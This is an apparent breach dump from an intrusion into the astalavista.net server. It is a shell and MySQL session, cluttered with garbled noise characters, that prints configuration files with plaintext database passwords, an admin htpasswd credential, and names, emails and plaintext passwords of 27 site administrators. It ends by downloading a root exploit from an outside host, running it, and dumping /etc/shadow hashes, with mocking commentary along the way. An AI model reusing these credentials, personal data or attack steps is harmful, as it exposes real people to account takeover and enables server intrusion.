) a) J1 D$ ^" ^8 O: udrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
5 Z! J. @8 T6 s1 S2 ~; {drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend' ~' H% }: Q: l( {2 V# |! z
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
; w7 N% U' A2 E. _3 a; l4 _) i+ {7 I-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
& x6 {! n/ t" m: x' X3 [drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
5 [7 t, p5 F; g) d( `: j# |drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron# Y0 \/ u R; T4 I) k6 ?1 c
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd% Q- D, F3 `3 D/ @# `' _$ d
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
0 |, x! ]5 @' g$ A' }- b-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
( o( [/ O5 e6 X" a) I) a0 X8 ^drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed2 M$ E" P x* f
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
1 N* |+ w* n/ ^) t: X7 w! L-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess$ w5 {+ l. X" y; N2 Z3 w7 Y
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess; Z( d2 k! S% ^
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
* f* s) I7 _1 |+ C-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
' j6 h7 _6 J O# h4 Q% H" P4 h* T. ?-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
' X" p+ S( ~5 s1 ~# S% k9 M' x-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
6 [' q, b6 \& [, o-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
0 [! J# D1 _+ v* s' W% adrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc3 y: |2 |5 D1 |: ^: j) b4 g
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang8 g$ R+ G; [; j8 J+ I3 x
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
2 c" z+ g( i& e. U# g# Vdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
' \) `. f- t9 ~7 {9 v) Pdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
$ [9 N) z' _( h, ]7 @/ T# Udrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata4 N4 o* @# U+ [
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
' g* W1 A9 y& m; Y- J& J j4 c-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
3 f6 ?4 x( r& n! o/ c: Edrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re% G9 B9 q) q7 a8 i1 I$ }
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
: }; `+ B8 s0 k1 m) Wdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
" A7 P/ H) q0 q( K& Pdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
5 o0 K8 S. d# c% h: r; g6 U9 Hdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com3 b8 _4 U; h+ Y/ {0 d* K4 }0 a
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes! z) C$ ~/ y% C* v
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src/ I* Z' Q$ ~4 k7 N8 p! T# m
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
) _1 f9 J" G/ C5 w6 ~: |drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v24 `, b2 _* M. l; {( S: x
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old& ^. d# i; w+ y
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php9 q4 ]% \, u1 J$ y% \! _. m6 W
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki$ u3 P; q4 e5 d( l& e, j1 I8 {, y
& @3 t/ H; P( M& ? hsh-3.2$ head -20 index.php: J7 u' z% {1 X( K! D; ?' {
<?PHP$ L. E7 y% F; q2 g4 k& X2 w- F" E& F
/**, Y8 ~4 ]! l; B9 z! Q+ D3 K; o
* Mainfile (external) for astalavistaNET v2.00 P$ {2 J! R3 f/ r* o( A }* W
*
6 x( g6 n( g" M7 j1 R* @copyright Astalavista IT Engineering GmbH
' F: l- P6 e" o$ h3 U* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>2 Z! l# V# F- i: o. s- y3 X
* @version 1.0
' t$ B; C" s3 {( m*/
: I$ s; m3 a( f7 ~) B1 Z
- v1 m' M0 ? H5 Q if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
: S3 |0 x0 x, f8 o3 b' | $dontStartSession = false;
; E2 n- s( [, u6 ? } else {
# T& f7 A B! e% X6 L% O $dontStartSession = true;) h. J2 _! F& U# N
}$ f% h/ z. ?! w! V, q
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
! P( w" h' H1 c( k0 _9 I require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
2 Y0 _. N3 J5 H' {; c( I0 A' | require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
/ {+ k0 y* l' c' {, H; P% M$ |) ? require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
- M9 d$ b8 V' O4 H( {/ w/ @8 b" ?2 _ s
sh-3.2$ cd config
1 X4 f; U9 ]' `0 \+ j6 hsh-3.2$ ls -la+ C; [* A! S7 _% s" [
total 327 s% T$ p0 u" l/ Z2 z* ]$ |
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
0 C* ^# k# w$ T @9 Bdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
^* `" U$ h `7 K) A-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
. r; S9 a( a4 A8 g- o7 d$ J7 ?-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php1 b1 p _# w0 M) I
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php$ ]8 g/ G3 t+ w" D3 Y+ V# g: q. j
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
; |0 k. q. Q3 Y) O1 Q9 w3 F-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php2 |* f2 ?9 t- H
0 G- `- z6 K) Ush-3.2$ cat com.conf.php
# a4 a* ]3 d! K[snip]
+ a% E6 Q* A1 P, |9 D//member-database* z4 n6 e: t3 P8 F# r7 Y
$_CONFIG['db_mem_server'] = ‘localhost’;0 ?4 \* g2 t8 u: X
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;" z$ k) I& T x8 l
$_CONFIG['db_mem_user'] = ‘astanet_db’;
- z2 Z2 I- Z$ \1 y$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;4 E" q! A1 ^4 l! { u; X9 S3 B
$_CONFIG['db_mem_debug'] = false; //true or false
" T( i4 K q+ n* S; i c//ads-database
, D" Y" G. W: t2 b$_CONFIG['db_ads_server'] = ‘localhost’;
% o+ W3 S7 }/ o* w" o6 _$_CONFIG['db_ads_database'] = ‘astanet_ads’;
9 c5 N5 P/ v6 c0 `& S$_CONFIG['db_ads_user'] = ‘astanet_db’;
[7 l3 H% f7 A' n+ j2 b6 y7 v$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;+ j' M$ g+ u/ X3 ?$ E
$_CONFIG['db_ads_debug'] = false; //true or false7 ?( A+ B# T0 Z; M! g
//rainbow-database1 _7 {( q7 y: f; R8 G l
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
! `& k. e; J8 e* h. D4 V6 U4 L, ~0 ^$_CONFIG['db_rainbow_database'] = ‘rainbow’; U$ u9 z9 ~! z% W8 G3 P9 ^: E# K
$_CONFIG['db_rainbow_user'] = ‘dinu’;
5 I' N& N8 R0 W& I( L6 F$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
/ A1 t; i3 C( d6 I. L1 E& [9 I4 d$_CONFIG['db_rainbow_debug'] = false; //true or false
2 h1 J- i5 G7 Z$ _: r//mailing lists database2 r i; z7 k k' v c
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;: O* Z5 R( ^" ^1 x2 ^8 U0 F
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
# D+ J |6 t% ^$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;: g" _3 ? P" v* Z4 A- F* K7 h8 |/ p
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;) F$ b4 q# v7 }6 l
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
. r! z8 y2 M: H6 ^" G4 `//paypal
( T: t' n" R" q6 r$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
* A, B0 \+ c) w8 K. r; k$_CONFIG['sub_pp_cmd'] = ‘_xclick’;" [8 G) L0 I4 f
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
% L' T, K- K6 h0 Y. p$_CONFIG['sub_pp_noship'] = ‘1′;
/ z" @2 Z6 I+ H1 D: A$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;' R! V6 P; N, t- U
[snip]
; [: e0 E2 N* u! v6 h) `$ c0 v1 ?' q3 x0 z% j. n8 }8 g
sh-3.2$ cd ..
" J% h: }' B# z1 I3 k, q! Nsh-3.2$ cd member2 E7 D# z7 O- ~$ Q/ L$ p
sh-3.2$ ls -la) z8 L/ C: t; J0 q5 |
total 200 ]6 r; |8 ~8 h
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .& G; S& H( `+ E: r) j- \2 I
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
1 l3 h$ ~: h" h- [2 y" O-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess5 S8 s( o2 }* }2 z5 S& L3 u
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
( x2 ]4 u0 ^; a5 R: U6 U# \sh-3.2$ cat .htaccess$ \, v, n( M6 B# R/ W( B5 X f
SecFilterEngine off: F- a7 P& \6 e3 u9 j0 O
6 f3 ]7 Q: R C3 \; Z
sh-3.2$ cd ..) [3 A5 D h6 g* Q
sh-3.2$ cd cron
- ~+ @' J* M* x1 l* A o# @4 N9 @ vsh-3.2$ ls -la
# N: s9 N; }* U- n' Ytotal 168
* N. D! X1 D4 s5 rdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
" @- q6 u- s7 u: xdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
w/ {7 w% W: l6 x8 }-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
+ }9 p7 |2 `; k; V-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
/ P; m! H6 N2 X1 L5 V v1 g& J4 ~) Y-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
3 w$ Z* P V! G' c d- E-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
$ r: p8 w7 f0 x6 O* `-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
; B- X% R% T% x+ i* ^+ x-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
" l! w0 q" \# ]3 ?-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
3 J- k4 N- y. a# j-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
6 f" o4 n# Y6 ]( ]; R: d( w-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
; y1 \5 [" {4 @- m) q-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
7 ?3 P8 I/ }' ~& w/ c3 t J-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
0 G, P- c P) ? w" L7 V; f$ Z/ C-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php/ ~+ C4 d5 m r" l$ |/ B7 w
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh( K( W3 |4 \5 W( ]+ |/ q+ Z( l) K1 V
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
8 j1 R% k8 E E6 o) N-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php/ b; |6 i$ s9 _3 X6 M" [+ _
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
+ u2 L, S) k6 f8 X) f6 M% K-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php3 V- c3 C0 \' j6 G$ n1 r
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
0 [, `0 j+ I5 v& g$ h1 G1 Ndrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email, @9 J1 s$ \4 h- y- R
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
% k5 k+ A+ i2 w/ P! t! A1 p9 _8 k T-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
, q, `& o7 j* E8 T9 C) R! J9 d* N
sh-3.2$ cd ..
% g! \" R9 ?, C3 \* @6 e: N! I# l1 vsh-3.2$ cd _007
" e/ h3 e, j2 E7 V; |+ c% Rsh-3.2$ ls -la! f$ F; y, z# E% z N
total 24
5 ?2 j5 P6 w* z* Kdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .! }/ ~' \( S2 X9 `$ z
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..8 D9 }2 W1 a' A! M0 a1 p
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess, \0 ?% `+ N- J: T. h
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php) b7 M, @0 ~. V
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
. ~5 C5 j0 E! {0 W. S2 Qdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
# H: K, U R P1 l' S9 ~7 s# P0 \2 }
sh-3.2$ cat .htaccess
, i# t$ ` m9 p( \. G4 y1 H& A4 IauthType Basic ]- D' N c; g
authName Admin" X( [ A N0 Z( X: K$ t$ p
authUserFile /home/astanet/auth/.htadm_pwd
7 u% g/ v/ G6 w4 c9 Irequire valid-user
4 t4 G6 |+ _' {. M+ ^0 c. o
! _+ K! N2 G1 L' \. Fsh-3.2$ cat /home/astanet/auth/.htadm_pwd( D# K, ~1 q! C8 f- [
admin2net:CR0bl65MwhfT
! d6 O' D$ j& ]( d9 D# P) s i3 \3 ~5 T
sh-3.2$ mysql -u astanet_db -p; V. b w" u, Q' y, T$ ]* v
Enter password:
w% _4 I% P) P- U; }Welcome to the MySQL monitor. Commands end with ; or \g.
! _7 l6 O6 y+ bYour MySQL connection id is 275153* C# Q% m6 n3 G! q6 l
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
/ m2 ~. n4 S4 }8 \8 \( A1 f- g& u2 S/ |( e1 @6 q5 }( f0 ]
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.! {2 ~" a H Q% z0 B
9 T. |' @# S* p% `$ _
mysql> show databases;7 P, V( C" k5 g2 g3 g+ ]
+———————–+) p" c6 y, z7 O6 O0 `. J* W
| Database |3 d- j- F' U& m: t% ^+ F
+———————–+8 _7 Y( W& w, M& D
| information_schema |
* K& w. |# D+ c! B| astanet_ads |
. h& g' k1 l# {: ^" G- X| astanet_mailing_lists |6 O% M9 }# O( @3 }2 X( u6 k
| astanet_mediawiki |2 J/ t. z5 e! Q4 _3 T
| astanet_membersystem |/ p* G- k i! K0 b7 ?
| test |) b- H* E5 @6 R8 {6 b
+———————–+
# k; F# G( ~* U1 Y* Y/ p+ G) I* M6 rows in set (0.00 sec)9 \ c- a% x6 w% |8 o7 T; N6 R
. S4 u) q0 v L) R$ v& amysql> use astanet_membersystem1 `1 N8 s) u S7 R
Database changed, @! Q, ~ Q& ~4 F T$ r, p& S: Z
mysql> show tables;
$ k i! T, n1 o$ j% B% f, c5 Q+———————————–+% {! {) a3 c& C/ z4 z
| Tables_in_astanet_membersystem |$ O! b# D F0 W7 y8 }
+———————————–+
0 l% G& ]" t5 O, ]+ P| blacklist_categories |- x* Y/ \& ^/ r6 o H4 k
| blacklist_content |
) f# P- x7 D0 X J8 X9 C" ]% S' L| blacklist_levels |* v1 @& q9 K; k0 B
| blacklist_mcset |' C$ e: Z+ }( ^" b& x
| dir_categories |
/ y- T* A& d; v( c$ C1 x| dir_comments |
/ o0 y, |. c$ n| dir_links |
( w% o1 f! e* k0 n- T* Y: t% ?8 m6 G| dir_temp |
" u+ c" k0 X9 l% Y2 o: x9 _3 L| dir_votes |% ~# A8 w$ K, }4 \) h: e6 l
| documents |0 M! r* J# V# h" g- r( f+ _: C& l
| documents_categories |
1 Q( E* O( l/ P$ j( ?| email_content |2 M: u E6 ^$ a- j' e- q5 C+ q
| email_settings |, A! `$ c+ L5 }9 u- W8 x
| exploits |9 W* n' Z) D& ^; u* i& v K: S
| exploits_categories |$ i) b: a0 Y+ E4 w9 s
| exploittree_categories |
K r# A3 D2 `| exploittree_exploits |/ K) Q7 c/ _! m& X- F
| home_values |
- X6 C; n6 ^% k3 I| iso_countries |
; \, r2 z6 [0 \, Q* f# W| links_categories |
5 q' G: p& y* q) w1 B3 u7 o| links_records |* T$ e( [6 i; j; B2 {+ n
| links_unauth |
+ ]) ^3 O8 o' k) F+ F1 Z| links_votes |
+ A' `+ z" Y! J0 g7 E4 d$ H| log |; ]: T w3 j7 A$ E) c# P1 {. y) b
| news_categories |9 E# v1 J4 v6 P
| news_comments |
8 W5 O3 j2 M3 Z1 y2 C! i| news_emoticons |7 ~: ^5 Y' {. M+ Y
| news_latest |
: E, n$ P3 m7 k9 o| news_messages |+ ^, M# D V3 z- f
| news_statistics |1 @4 L; p0 W3 {) o" G
| news_votes |
' ?8 W' F+ N8 J( T- \+ r; B* Q" U| prices_content |- C+ Y; [7 _* ~. X# B( q0 S3 X! C/ a
| prices_offers |
- n2 }6 K: @9 S7 C' h| rss_settings |# e/ m7 |/ J. b! f" v
| sessions |
5 F! g& `/ E+ w7 }' p7 || stats_signups |
' @" O4 {5 S7 c$ }| u2u2 |
. I! r$ c! ]: W8 ]1 j7 D+ ]; f| u2u_contact |
{# \8 L5 H; g: D, B" p* j| u2u_settings |
! s0 w3 _# i7 @9 E3 m7 G: J| user_keywords_selected_categories |' D1 z% e1 K7 f
| users |
" u1 J7 [! a! g3 R3 z, v| users_ipn_test |
+ p) v* c' W2 p1 c6 D: M| users_keyword_values |
; s' K/ A$ h; P; u! V& k% f! Q| users_profile |. L. j1 X( Q G
| users_temp |0 k: I2 X; H* m- y% _8 p
| users_upgrade |$ }2 C$ s* y' [
+———————————–+
, I! ]9 l$ W( N, ]46 rows in set (0.00 sec)0 r% T$ U, O6 t3 q9 g2 b4 v N- }
; M3 J; F; C+ S/ ]
mysql> describe users;$ J; R% ~3 P8 n+ |! f/ k9 I
+————————–+————————————–+——+—–+———————+—————-+* _, D# k+ X9 q9 h6 O9 }6 {. N
| Field | Type | Null | Key | Default | Extra |* y' x+ J: D- I, ~
+————————–+————————————–+——+—–+———————+—————-+8 f0 c4 m, h/ f# b& Q' v% M
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
3 u, ~" H: r; S+ B& f0 u| user | varchar(50) | NO | | | |$ s$ N2 ]+ ]* I0 K5 W+ N, z6 o
| nickname | varchar(30) | NO | MUL | anonymous | |+ J0 ^( d Y. ]0 G; E1 u
| password | varchar(30) | NO | | | |, T9 u& E i6 @2 V" R* {" t
| userlevel | tinyint(3) | YES | MUL | NULL | |
# c q& t7 f4 i$ |+ t| exp | int(8) unsigned | NO | | 0 | |1 D7 D' j7 z2 q
| email | varchar(50) | NO | | | |
* J$ p+ g* n# u9 H3 M) Z| ip | varchar(15) | NO | | 0 | |3 `, B7 c' S! e! N$ g8 W& M ?
| proxy | set(’0′,’1′) | NO | | 0 | |
5 w& k4 a. h& p" w S* C' i| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |. X5 _4 | a! a- n( I& S( x6 i: V
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |1 I. p, l I" ]7 Y7 d; r1 Y( ^& J( E
| anz_in | tinyint(1) | NO | | -1 | |4 y8 ^+ m8 j V3 q( U! Q7 r
| status | tinyint(1) unsigned | NO | | 0 | |" I) B" ~# U$ Z" \- Y$ O
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
7 j% I) x, r+ u9 {! [% t9 A| freemember | set(’0′,’1′) | NO | | 0 | |
6 E$ e- b4 O" D6 w% Z| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
' k; f3 i8 c0 Z* q* ^; l% J6 `6 ?| lang | tinytext | NO | | | |
* S; O4 x5 r9 I| adid | smallint(6) | NO | | 0 | |0 v# E6 E# j: I6 U5 A; o! k
| pp_txn_id | varchar(255) | YES | | NULL | |
" j. C! ]' I4 O- V1 R+ \| cnb_transaction_id | varchar(255) | YES | | NULL | |' R5 h3 z5 L; `3 ~% F/ U
| cnb_order_id | varchar(255) | YES | | NULL | |) p% X' P& K, h/ h0 ~: p# g/ j, L
| cnb_user_id | int(11) | YES | | 0 | |6 s4 ~ e5 d$ w( b U1 {
+————————–+————————————–+——+—–+———————+—————-+
+ L z6 e9 A% A; H0 W$ R& n22 rows in set (0.01 sec)
+ Q) U' b, ^# I3 B' s) n0 h8 [
* u) }+ ^. d4 P5 u* R0 |mysql> select count(*) as skids from users;
& X9 _' a: B/ w: |- I e1 S+——-+$ B$ ]6 m# x# @
| skids |
% V' O1 I( `" C+ k$ c# K9 D }+——-+
. R# d' x- B) E* _6 G& V| 25199 |
w' k$ A+ P# |( m4 m0 A+——-+
; b: H x1 f# e& }0 f% j2 F1 row in set (0.00 sec). J8 h- d7 s- f$ C
2 ~: x' d3 B) s" w* R! X4 S
mysql> select user,nickname,password,email from users where userlevel = 1;
2 p( S9 d* c/ q% T `% g+————————–+———————-+——————+———————————–+: h$ w# y- A! L' L4 ~
| user | nickname | password | email |3 s }# Z+ R `3 v8 I: g
+————————–+———————-+——————+———————————–+
' f' F' F5 i) j/ [- D- B| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
3 }1 |; h+ [$ m3 v0 L' n5 L5 @7 y| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |% e' {9 ?% S2 D9 F1 E$ G
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |( I B6 ?" N7 s5 P5 o
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
1 w* P0 \& z2 t9 p' Y! e| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
9 q/ V+ \! x3 c| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |' `; e9 F2 t1 V' p9 F# J# S3 k) u
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |5 K2 ]1 k* S: i: A
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
. K& l# R: {$ s0 Z; I| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
* o# b$ [8 a. `1 u1 v| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
% l0 n M. F' \| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
3 p4 U& X" G- O: E* [| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |( J$ I+ {5 e, E( Z+ V" V
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |! H- d* C; g# L6 x$ i
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
# R% ` T: p' m; L. Y- I, Y1 S| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
& F& l% G4 O6 x! z1 E| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |- ?- E4 E: D2 P" @" t4 O
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
1 K! s# O3 k, p" A| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
) ~" \# I- ]5 V! _9 M" q| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
& U/ f! i/ a) E: W" m7 ]. `3 l| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |! [0 q; d4 _( z5 b3 W, y& `5 [ k
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |3 D. ]; K. n$ P( c n
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
! E" }/ M8 X4 x4 I6 q| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |* i! ^6 w' y8 \% @
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
0 H' S( w! b$ B2 u- y4 |% n% T3 Q| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |& t4 y# O+ i% m
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
& F& i9 N) e2 R3 s, P; \$ k| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
" s* e2 V. F; f3 K3 t" b+————————–+———————-+——————+———————————–+
5 } j$ ?1 d' x/ F- d# D1 {& q27 rows in set (0.00 sec)
/ _, z, e6 x6 M1 b! Q/ W# ~) |$ Q" L6 y8 R% M, t8 A9 I
mysql> exit;
3 I1 D3 C+ P8 ^; Z9 `# fBye
3 ~. ~4 Y$ I& k4 i1 {. K
l$ x. Q3 g2 F* j- z, T[~] plaintext passwords? yes,
' ?9 N3 c# U% {! zThose so called “security professionals” who charge you $6.66 / month to
4 v$ v9 Q# j& H1 L8 mregister at their hack-proof portal, save your passwords in plaintext…6 y+ n" a ^: h. N+ t+ g6 n: F/ O, V
brilliant!3 e7 K3 F+ N( }- q( _
0 D+ [& T9 N8 Z* }- Q7 n* N; I[~] This been fun but we want more.
; E2 |2 N2 l0 E/ K8 g) n, x# d# y+ ~& P/ s( G. f) W
sh-3.2$ uname -a, o$ U+ c, E" z7 y a% p, P
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
! t% }. F: F( {% w ksh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]' ^ t" a/ D. e$ C
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]) p! E5 _8 C. {! t# ?) n" h
Resolving anti.sec.labs… 13.33.33.372 h$ N& N/ x6 L* |' o
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
9 M& m1 E* L( _5 lHTTP request sent, awaiting response… 200 OK
6 \( C" U. ]2 {+ g" FLength: 18200 (18K) [text/plain]
' Z+ p& B( A" ZSaving to: `g0troot’# @+ _# ?# ^* ~! h- n5 P& N8 |
3 L, J. H* H, }2 T7 X+ d100%[=========================================================================================================================================>] 18,200 58.6K/s in: X; ?( V! ]' |. R' \2 G! E( R' G4 w1 ?9 I
0.3s
6 G% Y: m1 U1 D; I9 S! v; n1 ]
' D5 q; e: K/ @% s: b5 o: m18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]2 ~( Y7 I( U, E& }$ w- c# q5 m& g
; ]1 A+ e( @4 Q- E. U* w0 Vsh-3.2$ ./g0troot -i x86_64
4 i; c" v: E$ y6 N: ]5 I2 T9 Y2 h[+] g0troot - anti.sec.labs7 L& @( O4 R: a" o# m2 H8 P: P
[+] Target: 2.6.18-128.1.10.el5
* _3 D/ W) R! l* `[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
2 u* r2 ?- ~# j) F$ P/ a8 e# e) n8 |) G( `. [/ k( o4 g' O
[+] r00tr00t
) [: A( w7 ~2 g: A[~] Executing shell…
/ Y4 R0 y, q! ^2 H* {; V% U' y5 ~9 z: ~5 A
sh-3.2# id
4 o/ u% ?" ~' J7 o: O6 U' a8 m, [uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) L& t; {+ D1 g7 X1 R
v& W5 l( S: N3 s9 n/ Q( n" } A2 ]
sh-3.2# cat /etc/shadow( {" U, f0 c; B- V( O
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
' f! X8 v6 ^5 X% b[snip]
# Q: C o, O0 s% a- j( j0 Eadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::1 p; x' ]2 q! u6 R8 v
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
